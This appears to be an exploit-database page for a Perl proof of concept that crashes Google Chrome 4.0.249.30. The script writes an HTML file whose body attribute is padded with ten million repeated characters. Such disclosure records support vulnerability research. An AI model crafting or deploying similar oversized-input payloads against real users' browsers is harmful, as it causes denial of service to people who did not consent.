header-logo
Suggest Exploit
vendor:
Chrome
by:
Anonymous
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Chrome
Affected Version From: 4.0.249.30
Affected Version To: 4.0.249.30
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown

google chrome 4.0.249.30 DoS PoC

In ordinary cases browser would redirect to 'http://www.google.com' but in this case browser will report error for something that should be possible and is possible on other browsers.

Mitigation:

Ensure that the application is not vulnerable to DoS attacks by validating user input and limiting the number of requests that can be made to the application.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#google chrome 4.0.249.30 DoS PoC
#
#
#Author: Anonymous
#
#Info: In ordinary cases browser would redirect to "http://www.google.com" 
#but in this case browser will report error for something that should 
#be possible and is possible on other browsers.
#
#
#
#I would like to thank Jeremy Brown who made very nice fuzzer for browser
#
#
#
#
#
#
#
#Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa


$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";